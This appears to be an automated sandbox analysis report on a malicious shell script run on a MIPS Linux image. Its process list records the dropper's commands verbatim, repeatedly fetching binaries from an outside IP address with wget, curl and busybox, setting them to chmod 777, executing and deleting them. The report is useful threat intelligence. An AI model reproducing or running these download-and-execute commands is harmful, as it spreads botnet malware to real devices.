Analysis Overview
SHA256
d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af
Threat Level: Shows suspicious behavior
The file d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 03:24
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
debian9-mipsbe-20240611-en
Max time kernel
72s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
